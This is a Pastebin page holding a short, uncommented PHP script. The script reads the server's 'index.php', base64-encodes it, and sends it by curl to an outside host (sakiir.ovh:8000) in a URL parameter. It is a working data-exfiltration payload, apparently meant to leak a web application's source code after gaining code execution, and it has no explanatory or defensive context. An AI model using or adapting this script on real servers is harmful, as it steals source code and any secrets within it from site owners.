Advertisement
Guest User

Untitled

a guest
Apr 20th, 2018
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.34 KB | None | 0 0
  1. <?php
  2.  
  3. # Retrieve the file content
  4. $c = base64_encode(file_get_contents('index.php'));
  5. $URL="https://sakiir.ovh:8000/?lol=".$c;
  6.  
  7. # Init Curl
  8. $s = curl_init();
  9.  
  10. # CURL Configuration
  11. curl_setopt($s,CURLOPT_URL,$URL);
  12. curl_setopt($s,CURLOPT_HEADER, true);
  13.  
  14. # Sending HTTP request
  15. curl_exec($s);
  16.  
  17. # Close the curl handle
  18. curl_close($s);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement